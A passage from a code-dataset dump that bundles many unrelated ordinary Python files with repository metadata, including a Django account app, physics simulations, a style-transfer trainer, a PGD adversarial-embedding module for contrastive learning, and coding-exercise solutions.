glob.glob(op.join(config, \"*.pth\"))[0] for config in self.ckpt_list}\n models = [init_detector(config, pth) for config, pth in self.items.items()]\n self.test_pipeline = [i for i in range(len(models))]\n for i, model in enumerate(models):\n model.cfg.test_dataloader.dataset.pipeline[0].type = 'LoadImageFromNDArray'\n self.test_pipeline[i] = Compose(model.cfg.test_dataloader.dataset.pipeline)\n return models\n\n def load_frames(self): #input = image directory, return image list/ NEED implement\n images = None\n return images\n\n def inf_frame_per_model(self):\n frame_per_model = [[model_name.split('/')[-1].split('.')[0]] for model_name in self.items.keys()]\n for idx in range(len(self.models)):\n for frame in self.frames:\n inf_time = self.check_speed(self.models[idx], frame, idx)\n frame_per_model[idx].append(inf_time)\n return frame_per_model\n\n def inf_model_per_frame(self):\n model_per_frame = [[model_name.split('/')[-1].split('.')[0]] for model_name in self.items.keys()]\n for frame in self.frames:\n for idx in range(len(self.models)):\n inf_time = self.check_speed(self.models[idx], frame, idx)\n model_per_frame[idx].append(inf_time)\n return model_per_frame\n\n def check_speed(self, model, frame, idx):\n start = time.time()\n inference_detector(model, frame, test_pipeline=self.test_pipeline[idx])\n inf_time = time.time() - start\n return inf_time\n\n def logging_data(self, output, vis=False):\n index = np.array([i - 1 for i in range(len(self.frames) + 1)])\n index = index[np.newaxis, :]\n split_bar = np.array(['|' for i in range(len(self.frames) + 1)])\n model_per_frame = np.array(self.inf_model_per_frame())\n frame_per_model = np.array(self.inf_frame_per_model())\n result_table = np.vstack([index, model_per_frame, split_bar[np.newaxis, :], frame_per_model])\n result_table = result_table.T\n self.write_log(output, result_table)\n\n def write_log(self, output, results):\n with open(op.join(output, time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time()))+\".csv\"), 'w') as f:\n w = csv.writer(f)\n for result in results:\n w.writerow(result)\n\n\nckpt_list = glob.glob(op.join(\"/mnt/intHDD/mmdet_ckpt/test_yolo\", \"*\"))\noutput_path = \"/home/gorilla/lee_ws/optimize_model/optimize_model/speed_log\"\nt = SpeedLog(ckpt_list, output_path, using_video=True)\nprint(\"\")","repo_name":"SsduckK/optimize_model","sub_path":"models_speed_check.py","file_name":"models_speed_check.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31423456575","text":"import heapq\n\n\ndef solution(scoville, K):\n heapq.heapify(scoville)\n cnt = 0\n while True:\n if len(scoville) <= 1 and scoville[0] < K:\n return -1\n\n if scoville[0] >= K:\n return cnt\n\n new = heapq.heappop(scoville) + (heapq.heappop(scoville) * 2)\n heapq.heappush(scoville, new)\n cnt += 1\n\n\nif __name__ == \"__main__\":\n scoville = [1, 2, 3, 9, 10, 12]\n K = 7\n res = solution(scoville, K)\n print(res)\n","repo_name":"jinwooklim/coding-test","sub_path":"programmers/coding_test_kit/heap/heap01.py","file_name":"heap01.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12799927434","text":"import copy\nfrom dataclasses import field\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom marshmallow import fields, ValidationError\n\nfrom ludwig.api_annotations import DeveloperAPI\nfrom ludwig.constants import TYPE\nfrom ludwig.schema import utils as schema_utils\nfrom ludwig.schema.features.augmentation.base import BaseAugmentationConfig\nfrom ludwig.utils.registry import Registry\n\n_augmentation_config_registry = Registry()\n\n\n@DeveloperAPI\ndef get_augmentation_config_registry() -> Registry:\n return _augmentation_config_registry\n\n\n@DeveloperAPI\ndef register_augmentation_config(name: str, features: Union[str, List[str]]):\n if isinstance(features, str):\n features = [features]\n\n def wrap(cls):\n for feature in features:\n augmentation_registry = get_augmentation_config_registry().get(feature, {})\n augmentation_registry[name] = cls\n get_augmentation_config_registry()[feature] = augmentation_registry\n return cls\n\n return wrap\n\n\n@DeveloperAPI\ndef get_augmentation_cls(feature: str, name: str):\n return get_augmentation_config_registry()[feature][name]\n\n\n@DeveloperAPI\ndef get_augmentation_classes(feature: str):\n return get_augmentation_config_registry()[feature]\n\n\n@DeveloperAPI\ndef AugmentationDataclassField(\n feature_type: str,\n default: Union[str, BaseAugmentationConfig] = False,\n default_augmentations: Optional[List[BaseAugmentationConfig]] = None,\n description: str = \"\",\n):\n \"\"\"Custom dataclass field that when used inside a dataclass will allow the user to specify an augmentation\n config.\n\n Args:\n default: The default augmentation config to use.\n default_augmentations: The default list of augmentations to use when param value is set to `True`.\n description: The description of the augmentation config.\n\n Returns: Initialized dataclass field that converts a list with params to an augmentation config.\n \"\"\"\n\n default_augmentations = default_augmentations or []\n default_augmentations = [a.to_dict() for a in default_augmentations]\n\n if isinstance(default, bool):\n default = default_augmentations if default else []\n\n class AugmentationContainerMarshmallowField(fields.Field):\n \"\"\"Custom marshmallow field that deserializes a list for a valid augmentation config from the\n augmentation_registry and creates a corresponding JSON schema for external usage.\"\"\"\n\n def _deserialize(self, value, attr, data, **kwargs):\n if isinstance(value, bool):\n value = default_augmentations if value else []\n\n if not isinstance(value, list):\n raise ValidationError(f\"Augmentation config must be a list, found: {type(value)}\")\n\n augmentation_classes = get_augmentation_classes(feature_type)\n augmentation_list = []\n for augmentation in value:\n augmentation_op = augmentation[TYPE]\n if augmentation_op in augmentation_classes:\n augmentation_cls = augmentation_classes[augmentation_op]\n pre = augmentation_cls()\n try:\n augmentation_list.append(pre.Schema().load(augmentation))\n except (TypeError, ValidationError) as error:\n raise ValidationError(\n f\"Invalid augmentation params: {value}, see `{pre}` definition. Error: {error}\"\n )\n else:\n raise ValidationError(\n f\"Invalid augmentation type: '{augmentation_op}', \"\n f\"expected one of: {list(augmentation_classes.keys())}\"\n )\n return augmentation_list\n\n def _jsonschema_type_mapping(self):\n return get_augmentation_list_jsonschema(feature_type, default)\n\n try:\n assert isinstance(default, list), \"Augmentation config must be a list.\"\n load_augmentation_list = []\n dump_augmentation_list = []\n for augmentation in default:\n augmentation_op = augmentation[TYPE]\n augmentation_cls = get_augmentation_cls(feature_type, augmentation_op)\n pre = augmentation_cls()\n try:\n load_augmentation_list.append(pre.Schema().load(augmentation))\n dump_augmentation_list.append(pre.Schema().dump(augmentation))\n except (TypeError, ValidationError) as error:\n raise ValidationError(f\"Invalid augmentation params: {default}, see `{pre}` definition. Error: {error}\")\n\n load_default = lambda: copy.deepcopy(load_augmentation_list)\n dump_default = dump_augmentation_list\n\n return field(\n metadata={\n \"marshmallow_field\": AugmentationContainerMarshmallowField(\n allow_none=False,\n dump_default=dump_default,\n load_default=load_default,\n )\n },\n default_factory=load_default,\n )\n except Exception as e:\n raise ValidationError(f\"Unsupported augmentation type. See augmentation_registry. \" f\"Details: {e}\")\n\n\n@DeveloperAPI\ndef get_augmentation_list_jsonschema(feature_type: str, default: List[Dict[str, Any]]):\n \"\"\"This function returns a JSON augmentation schema.\n\n Returns: JSON Schema\n \"\"\"\n augmentation_types = sorted(list(get_augmentation_config_registry()[feature_type].keys()))\n schema = {\n \"oneOf\": [\n {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"type\": {\n \"type\": \"string\",\n \"enum\": augmentation_types,\n \"title\": \"type\",\n \"description\": \"Type of augmentation to apply.\",\n },\n },\n \"additionalProperties\": True,\n \"allOf\": get_augmentation_list_conds(feature_type),\n \"required\": [\"type\"],\n },\n \"title\": \"array_option\",\n },\n {\"type\": \"boolean\", \"description\": \"Apply standard augmentation pipeline.\", \"title\": \"boolean_option\"},\n ],\n \"title\": \"augmentation\",\n }\n\n return schema\n\n\n@DeveloperAPI\ndef get_augmentation_list_conds(feature_type: str):\n \"\"\"This function returns a list of if-then JSON clauses for each augmentation type along with their properties\n and constraints.\n\n Returns: List of JSON clauses\n \"\"\"\n conds = []\n for augmentation_op in get_augmentation_classes(feature_type):\n schema_cls = get_augmentation_cls(feature_type, augmentation_op)\n augmentation_schema = schema_utils.unload_jsonschema_from_marshmallow_class(schema_cls)\n augmentation_props = augmentation_schema[\"properties\"]\n schema_utils.remove_duplicate_fields(augmentation_props)\n augmentation_cond = schema_utils.create_cond({\"type\": augmentation_op}, augmentation_props)\n conds.append(augmentation_cond)\n return conds\n","repo_name":"ludwig-ai/ludwig","sub_path":"ludwig/schema/features/augmentation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":10151,"dataset":"github-code","pt":"39"} +{"seq_id":"31848624434","text":"import random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import compute_cl_loss\n\n\nclass PGD(nn.Module):\n r\"\"\"\n PGD in the paper 'Towards Deep Learning Models Resistant to Adversarial Attacks'\n [https://arxiv.org/abs/1706.06083]\n\n Distance Measure : Linf\n\n Arguments:\n model (nn.Module): model to attack.\n eps (float): maximum perturbation. (Default: 8/255)\n alpha (float): step size. (Default: 2/255)\n steps (int): number of steps. (Default: 10)\n random_start (bool): using random initialization of delta. (Default: True)\n\n Shape:\n - input_tensor: :math:`(N, L, d)`\n - labels: :\n - output: :\n\n Examples::\n\n \"\"\"\n def __init__(self,\n eps=0.08,\n alpha=0.05,\n steps=3,\n ):\n super().__init__()\n self.eps = eps\n self.alpha = alpha\n self.steps = steps\n\n def forward(self, input_embedding, input_tensor_b, model=None):\n r\"\"\"\n\n \"\"\"\n model.eval()\n\n input_embedding = input_embedding.clone().detach()\n input_tensor_b = input_tensor_b.clone().detach()\n adv_inputs = input_embedding.clone().detach()\n\n loss = compute_cl_loss\n for _ in range(self.steps):\n adv_inputs.requires_grad = True\n input_tensor_a_ = model.get_input_representations(inputs_embeds=adv_inputs)\n\n # Calculate loss\n cost = - loss(input_tensor_a_, input_tensor_b)\n\n # Update adversarial samples\n grad = torch.autograd.grad(cost, adv_inputs,\n retain_graph=False, create_graph=False)[0]\n\n adv_inputs = adv_inputs.detach() + self.alpha*grad.sign()\n delta = torch.clamp(adv_inputs - input_embedding, min=-self.eps, max=self.eps)\n adv_inputs = torch.clamp(input_embedding + delta, min=0, max=1).detach()\n\n return adv_inputs\n","repo_name":"Changanyue/bert-downstream-framework","sub_path":"downstream_framework/Simcse-adv/PGD.py","file_name":"PGD.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"39"} +{"seq_id":"6061116905","text":"class Solution:\n \"\"\"\n 剑指 Offer 20. 表示数值的字符串\n \"\"\"\n\n def isNumber(self, s: str) -> bool:\n if not s:\n return False\n is_num, is_dot, is_e_or_E = False, False, False\n s = s.strip()\n for i in range(len(s)):\n if '0' <= s[i] <= '9':\n # 判断当前字符是否为 0~9 的数位\n is_num = True\n elif s[i] == '.':\n # 遇到小数点\n if is_dot or is_e_or_E:\n return False\n is_dot = True\n elif s[i] == 'e' or s[i] == 'E':\n if not is_num or is_e_or_E:\n return False\n is_e_or_E = True\n is_num = False\n elif s[i] == '-' or s[i] == '+':\n if i != 0 and s[i - 1] != 'e' and s[i - 1] != 'E':\n return False\n else:\n return False\n return is_num\n\n\nif __name__ == '__main__':\n s = Solution()\n valid_sample = [\"+100\", \"5e2\", \"-123\", \"3.1416\", \"-1E-16\", \"0123\"]\n for sample in valid_sample:\n print(s.isNumber(sample))\n invalid_sample = [\"12e\", \"1a3.14\", \"1.2.3\", \"+-5\", \"12e+5.4\"]\n for sample in invalid_sample:\n print(s.isNumber(sample))\n","repo_name":"joizhang/leetcode-python","sub_path":"lcof/string/Offer_20.py","file_name":"Offer_20.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34106634582","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import RegistrationForm, LoginForm, AccountUpdateForm\nfrom .models import Account\n\nfrom friends.models import FriendRequest, FriendList\nfrom utils.search import binary_search\n\n\ndef register_view(request):\n \"\"\"View to register new user\"\"\"\n if request.user.is_authenticated:\n return HttpResponse(\n f\"You are already authenticated with {request.user.email}\"\n )\n if request.method == \"POST\":\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n account = authenticate(email=form.cleaned_data[\"email\"].lower(),\n password=form.cleaned_data[\"password1\"])\n if account.is_active:\n login(request, account)\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"home\")\n else:\n form = RegistrationForm()\n return render(request, \"account/register.html\",\n {\"registration_form\": form})\n\n\ndef logout_view(request):\n \"\"\"Log out user out of the website\"\"\"\n logout(request)\n return redirect(\"home\")\n\n\ndef login_view(request):\n \"\"\"Login view to authenticate the user using email and password\"\"\"\n if request.user.is_authenticated:\n return redirect(\"home\")\n\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n user = authenticate(email=form.cleaned_data[\"email\"],\n password=form.cleaned_data[\"password\"])\n if user:\n if user.is_active:\n login(request, user)\n if request.GET.get(\"next\"):\n return redirect(request.GET.get(\"next\"))\n return redirect(\"home\")\n else:\n form.add_error(None, \"User account is not active.\")\n else:\n form.add_error(None, \"User not found with above credentials\")\n else:\n form = LoginForm()\n return render(request, \"account/login.html\", {\"login_form\": form})\n\n\ndef account_view(request, username):\n \"\"\"View to show details of user account\"\"\"\n try:\n account = Account.objects.get(username=username)\n except Account.DoesNotExist:\n return HttpResponseNotFound(\"The user doesn't exist.\")\n else:\n request_user = request.user\n is_friend, request_status, friend_requests = False, None, None\n pending_friend_request_id = None\n\n # Check if client-user is logged-in and is seeing self account\n is_self = request_user.is_authenticated and request_user == account\n\n if request_user.is_authenticated and not is_self:\n # Check if client user is friend with account opened\n is_friend = request_user.friend_list.is_friend(account)\n if not is_friend:\n # Check if friend request has been sent by any of them\n friend_request: FriendRequest = FriendRequest.objects.filter(\n Q(sender=request_user, receiver=account) |\n Q(sender=account, receiver=request_user),\n is_active=True\n ).last()\n if friend_request:\n # Check if request is sent by sign-in user to other account\n if friend_request.sender == request_user and \\\n friend_request.receiver == account:\n request_status = \"SENT\"\n # Check if request is received by sign-in user from other\n # account\n elif friend_request.sender == account and \\\n friend_request.receiver == request_user:\n request_status = \"RECEIVED\"\n pending_friend_request_id = friend_request.pk\n elif is_self:\n friend_requests = FriendRequest.objects.filter(\n receiver=request_user, is_active=True\n ).count()\n ctx = {\n \"account\": account,\n \"is_self\": is_self,\n \"is_friend\": is_friend,\n \"request_status\": request_status,\n \"friends_count\": account.friends.count(),\n \"friend_requests\": friend_requests,\n \"pending_friend_request_id\": pending_friend_request_id\n }\n return render(request, \"account/account.html\", ctx)\n\n\ndef account_search_view(request):\n \"\"\"View to search accounts\"\"\"\n\n ctx = {}\n search_query = request.GET.get(\"q\")\n if len(search_query) > 0:\n search_results = Account.objects.filter(\n Q(email__icontains=search_query) |\n Q(username__icontains=search_query)\n ).only(\"id\", \"email\", \"username\", \"profile_image\").distinct()\n\n # [(account1: Account, friendship_status_with_me: bool), ...]\n if request.user.is_authenticated:\n my_friends = tuple(\n FriendList.objects.get(user=request.user).friends\n .order_by(\"pk\").values_list(\"pk\", flat=True)\n )\n accounts = [\n (account, binary_search(account.pk, my_friends))\n for account in search_results\n ]\n else:\n accounts = [(account, False) for account in search_results]\n ctx[\"accounts\"] = accounts\n\n return render(request, \"account/account_search.html\", ctx)\n\n\n@login_required()\ndef account_update_view(request):\n \"\"\"View to updated account details\"\"\"\n ctx = {\"DATA_UPLOAD_MAX_SIZE\": settings.DATA_UPLOAD_MAX_MEMORY_SIZE}\n if request.method == \"POST\":\n form = AccountUpdateForm(\n request.POST, request.FILES, instance=request.user\n )\n if form.is_valid():\n form.save()\n return redirect(\"account:view\", request.user.username)\n else:\n form = AccountUpdateForm(instance=request.user)\n ctx[\"form\"] = form\n return render(request, \"account/account_update.html\", ctx)\n","repo_name":"abhie-lp/realtime-chat-django","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71866798514","text":"import json\nimport jsonpath\nimport requests\nimport openpyxl\n\nclass Common:\n\n def __init__(self, FileNamePath, SheetName):\n global ex, sh\n ex = openpyxl.load_workbook(FileNamePath)\n sh = ex[SheetName]\n\n def fetch_row_count(self):\n rows = sh.max_row\n return rows\n\n def fetch_column_count(self):\n col = sh.max_column\n return col\n\n def fetch_key_names(self):\n c = sh.max_column #buscar cuantas hay en la hoja, se retornan 4 porque el libro tiene 4 columnas\n li=[] # se crea una lista vacia\n for i in range(1,c+1): # se ejecuta el ciclo de 1-5\n cell = sh.cell(row=1, column=i) # se recorre desde la primera fila y la columna es el valor i del ciclo\n li.insert(i-1, cell.value) # se inserta en la lista el valor\n return li\n\n def update_request_with_data(self, rowNumber, jsonRequest, keyList):\n c = sh.max_column\n for i in range(1,c+1): # se recorren todas las columnas xq cada fila tiene multiples columnas\n cell = sh.cell(rowNumber, column=i) #Buscar data de una columna en particular\n jsonRequest[keyList[i-1]] = cell.value\n return jsonRequest\n\n\n\n\n","repo_name":"JuanPulido90/TestingPython","sub_path":"DataDriven/Library.py","file_name":"Library.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39131681167","text":"from mayan.settings.development import *\n# Debug Toolbar\n# from mayan.settings.development.ddt import *\n\nINSTALLED_APPS += (\n 'botech.edms',\n)\n\nif DEBUG:\n # See https://django-debug-toolbar.readthedocs.io/en/latest/installation.html#configure-internal-ips\n # Set internal ips so that they work inside of a container as intended.\n import socket # only if you haven't already imported this\n hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())\n INTERNAL_IPS = [ip[: ip.rfind(\".\")] + \".1\" for ip in ips] + [\"127.0.0.1\", \"10.0.2.2\"]\n\n# Debug toolbar configuration\n#\n# So far the only working way is to use the toolbar in one of the admin views\n# and find the requests via the history panel.\nRENDER_PANELS = False\nRESULTS_CACHE_SIZE = 300\nSHOW_COLLAPSED = True\n","repo_name":"johbo/botech-edms","sub_path":"botech/edms_dev/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14949078726","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 24 16:14:13 2023\n\n@author: gabriel\n\"\"\"\nimport numpy as np\nfrom superconductor import TrivialSparseSuperconductor, \\\n A1usSparseSuperconductor \nfrom junction import Junction, PeriodicJunction, PeriodicJunctionInXAndY\nfrom phase_functions import phase_soliton_antisoliton, phase_single_soliton\nimport scipy\nfrom functions import get_components\nimport matplotlib.pyplot as plt\n\n\nL_x = 150\nL_y = 150\nL = 50 #odd\nt = 1\nt_J = t/25\nDelta_p_A1us = t/5\nDelta_s_A1us = 0\nmu = -2*t\nn = 12 #number of eigenvalues in sparse diagonalization\nphi_external = 0\ny = np.arange(1, L_y+1)\ny_0 = (L_y-L)//2\ny_1 = (L_y+L)//2\ny_s = (L_y+10)//2\n\nPhi = phase_soliton_antisoliton(phi_external, y, y_0, y_1)\n# Phi = phase_single_soliton(phi_external, y, y_0)\n\nS_1 = A1usSparseSuperconductor(L_x, L_y, t, mu, Delta_s_A1us, Delta_p_A1us)\nS_2 = A1usSparseSuperconductor(L_x, L_y, t, mu, Delta_s_A1us, Delta_p_A1us)\n\n# J = PeriodicJunction(S_1, S_2, t_J, Phi)\n# J = Junction(S_1, S_2, t_J, Phi)\nJ = PeriodicJunctionInXAndY(S_1, S_2, t_J, Phi)\n\neigenvalues_sparse, eigenvectors_sparse = scipy.sparse.linalg.eigsh(J.matrix, k=n, sigma=0) \n\n#%% Probability density\nindex = np.arange(n) #which zero mode (less than k)\nprobability_density = []\nfor i in index:\n destruction_up, destruction_down, creation_down, creation_up = get_components(eigenvectors_sparse[:,i], J.L_x, J.L_y)\n probability_density.append((np.abs(destruction_up)**2 + np.abs(destruction_down)**2 + np.abs(creation_down)**2 + np.abs(creation_up)**2)/(np.linalg.norm(np.abs(destruction_up)**2 + np.abs(destruction_down)**2 + np.abs(creation_down)**2 + np.abs(creation_up)**2)))\n \nindex = 2\nfig, ax = plt.subplots()\nimage = ax.imshow(probability_density[index], cmap=\"Blues\", origin=\"lower\") #I have made the transpose and changed the origin to have xy axes as usually\nplt.colorbar(image)\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_title(\"Probability density\")\nax.text(0,0, rf'$index={index}$')\nplt.tight_layout()\n\nprobability_density_right = probability_density[index][:, S_1.L_x-1]/np.linalg.norm(probability_density[index][:, S_1.L_x-1]) #The y-axis is inverted\n\nfig, ax = plt.subplots()\nax.plot(y, probability_density_right, \"o\")\n#ax.plot(np.arange(1, L_y+1), probability_density[index][:, L_x//2-1])\nax.set_xlabel(r\"$\\ell$\")\nax.set_ylabel(\"Probability density at the junction\")\nax.text(5,25, rf'$index={index}$')\n\nnp.savez(\"L=100\", y=y, psi=probability_density_right)","repo_name":"gabriel-rodriguez-ruiz/fluxon","sub_path":"A1us_A1us_junction_diagonalization.py","file_name":"A1us_A1us_junction_diagonalization.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71396909554","text":"import numpy as np\nimport tensorflow as tf\nimport cv2\nimport os\nimport random\nimport time\nimport argparse\n\nfrom tqdm import tqdm\n\nfrom tensorflow.keras.applications.vgg19 import VGG19\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Input, Conv2D, BatchNormalization, ReLU, UpSampling2D\nfrom tensorflow.keras.optimizers import Adam\n\nfrom models import init_transform_model, init_loss_models, init_model\nfrom loss_functions import calc_style_loss, calc_content_loss\nfrom batch_generators import batch_generator\n\n\n\ndef trainer(alpha, beta, image_dim, batch_size, steps_per_epoch, epochs, coco_dirpath, save_weights_path, style_image_path):\n\t\"\"\" Train transfomation network to reconstruct input images in the desired style \"\"\"\n\n\t# Layers for loss calculations\n\tcontent_layers = ['block3_conv3']\n\tstyle_layers = ['block1_conv2', 'block2_conv2', 'block3_conv3', 'block4_conv3']\n\n\tcontent_losses = [calc_content_loss]\n\tstyle_losses = [calc_style_loss, calc_style_loss, calc_style_loss, calc_style_loss]\n\n\tcontent_weights = [alpha]\n\tstyle_weights = [beta, beta, beta, beta]\n\n\n\t# Initiate models\n\ttransform_model = init_transform_model()\n\tloss_model, content_loss_model, style_loss_model = init_loss_models(content_layers, style_layers)\n\tmodel = init_model(transform_model, loss_model)\n\n\t# Load style image and extract featuremaps\n\tstyle_image = cv2.imread(style_image_path).astype(np.float32) / 255\n\tstyle_image_resized = cv2.resize(style_image, (image_dim, image_dim))\n\tstyle_image_batch = np.repeat(np.expand_dims(style_image_resized, axis=0), repeats=batch_size, axis=0)\n\n\tstyle_featuremaps = style_loss_model.predict(style_image_batch)\n\n\n\t# Generator to train reconet\n\tbatch_gen = batch_generator(coco_dirpath, content_loss_model, style_featuremaps, image_dim, batch_size)\n\t(a, b) = next(batch_gen) # Tensorflow bug: will crash without calling the generator once before training\n\n\n\tmodel.compile(optimizer='adam', loss=content_losses+style_losses, loss_weights=content_weights+style_weights)\n\n\tmodel.fit_generator(\n\t\tgenerator=batch_gen,\n\t\tsteps_per_epoch=steps_per_epoch,\n\t\tepochs=epochs)\n\n\ttransform_model.save_weights(save_weights_path)\n\n\n\n\nif __name__ == '__main__':\n\n\t# Input arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--alpha')\n\tparser.add_argument('--beta')\n\tparser.add_argument('--image_dim')\n\tparser.add_argument('--batch_size')\n\tparser.add_argument('--steps_per_epoch')\n\tparser.add_argument('--epochs')\n\tparser.add_argument('--coco_dirpath')\n\tparser.add_argument('--save_weights_path')\n\tparser.add_argument('--style_image_path')\n\targs = parser.parse_args()\n\t\n\t# Call the trainer function with parameters\n\ttrainer(\n\t\talpha = int(args.alpha),\n\t\tbeta = int(args.beta),\n\t\timage_dim = int(args.image_dim),\n\t\tbatch_size = int(args.batch_size),\n\t\tsteps_per_epoch = int(args.steps_per_epoch),\n\t\tepochs = int(args.epochs),\n\t\tcoco_dirpath = args.coco_dirpath,\n\t\tsave_weights_path = args.save_weights_path,\n\t\tstyle_image_path = args.style_image_path)","repo_name":"caseypeat/Neural-Transfer-Realtime","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"8865818572","text":"from lpp import *\nRAW = fasta_check(open(sys.argv[1],'rU'))\nEND = open(sys.argv[2],'w')\nNEW = open(sys.argv[4],'w')\nTAB = open(sys.argv[3],'w')\nall_data = Ddict()\ntop_data = {}\nall_new = {}\nfor t,s in RAW:\n\tgene = re.search(\"gene=(\\S+)\",t)\n\tref_gene_id = re.search( \"ref_gene_id=(\\S+)\",t )\n\tif gene:\n\t\tgene = re.search(\"gene=(\\S+)\",t).group(1)\n\telse:\n\t\tgene = t[1:].split()[0]\n\tif ref_gene_id:\n\t\tgene = ref_gene_id.group(1)\n\tif \"ref_gene_id\" not in t:\n\t\tall_new [gene] = \"\"\n\n\trna_name = re.search(\"^\\>(\\S+)\",t).group(1)\n\tall_data[gene][rna_name]=\"\"\n\tif gene not in top_data:\n\t\ttop_data[gene]=[len(s),rna_name,s]\n\telse:\n\t\tif len(s) >top_data[gene][0]:\n\t\t\ttop_data[gene]=[len(s),rna_name,s]\n\t\t\t\t\n\t\t\t\t\nfor key in top_data:\n\tEND.write('>'+key+'\\n'+top_data[key][-1])\n\tTAB.write( key+'\\t'+ top_data[key][1]+'\\t'+'; '.join( all_data[key] ) )\n\tif key in all_new:\n\t\tTAB.write(\"\\tNew\\n\")\n\t\tNEW.write('>'+key+'\\n'+top_data[key][-1])\n\telse:\n\t\tTAB.write(\"\\t-\\n\")\n\t\t\n\t\t","repo_name":"lpp1985/lpp_Script","sub_path":"StringTieCDS_Sep.py","file_name":"StringTieCDS_Sep.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"23631626698","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('statscollect_db', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='footballpersonalstats',\n name='penalties_saved',\n field=models.SmallIntegerField(null=True, blank=True),\n ),\n ]\n","repo_name":"matthieucham/statscollect","sub_path":"statscollect_db/migrations/0002_footballpersonalstats_penalties_saved.py","file_name":"0002_footballpersonalstats_penalties_saved.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33781168851","text":"from tkinter import *\nlogs = Tk()\nlogs.geometry(\"400x400+300+300\")\n\n\n\n\n\ndef Adarbība ():\n print(\"Paldies!\")\ndef Bdarbība():\n print(\"Au! Man sāp!\")\n\npogaA = Button(text='ķļikšņi te!', command=Adarbība)\npogaB = Button(text='Neķļikšņi te!', command=Bdarbība)\n\npogaB.pack(side=TOP)\npogaA.pack(side=BOTTOM)\n\n\nlogs.mainloop()\n","repo_name":"AleksandrZelukin/macibu_programmas","sub_path":"Grafiskas_programmas/Logs_terminal.py","file_name":"Logs_terminal.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"lv","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"34616472966","text":"import re, itertools\nfrom timeit import default_timer\n\nFILE = \"day19_input.txt\"\n\nrule_regex = re.compile(\"^(?P\\d+): (?P.+)$\")\nbase_regex = re.compile('^\"([a-z])\"$')\n\n\nclass Rule:\n def __init__(self, base, sub_rules):\n self.base = base\n self.sub_rules = sub_rules\n self.rule_set = None\n self.contributing_rules = set()\n\n def __repr__(self):\n if self.base is not None:\n return f\"{self.base}\"\n elif self.sub_rules is not None:\n return f\"{self.sub_rules}\"\n else:\n return \"Null rule\"\n\n def construct_alternatives(self, all_rules):\n if self.rule_set is not None:\n return list(self.rule_set), set(self.contributing_rules)\n\n self.rule_set = list()\n if self.base is not None:\n self.rule_set.append(self.base)\n else:\n assert self.sub_rules is not None\n for alternative in self.sub_rules:\n expanded_sub_rules = list()\n for rule_index in alternative:\n self.contributing_rules.add(rule_index)\n expanded_rule, contributing_sub_rules = all_rules[\n rule_index\n ].construct_alternatives(all_rules)\n expanded_sub_rules.append(expanded_rule)\n self.contributing_rules = (\n self.contributing_rules | contributing_sub_rules\n )\n combined_sub_rules = itertools.product(*expanded_sub_rules)\n for rule in combined_sub_rules:\n self.rule_set.append(\"\".join(rule))\n return (list(self.rule_set), set(self.contributing_rules))\n\n # Returns True if message matches rule, False otherwise\n # Can only be called after construct_alternatives\n def apply_rule_to_message(self, message):\n for rule in self.rule_set:\n if rule == message:\n return True\n return False\n\n\ndef read_file(filename):\n rules = dict()\n messages = list()\n parsing_rules = True\n with open(filename, \"r\") as f:\n for l in f:\n if l.strip() == \"\":\n parsing_rules = False\n elif parsing_rules:\n rule_match = re.match(rule_regex, l.strip())\n assert rule_match is not None\n base_match = re.match(base_regex, rule_match.group(\"rule\"))\n base = None\n sub_rules = None\n if base_match:\n base = base_match.group(1)\n else:\n sub_rules = [\n x.strip().split(\" \")\n for x in 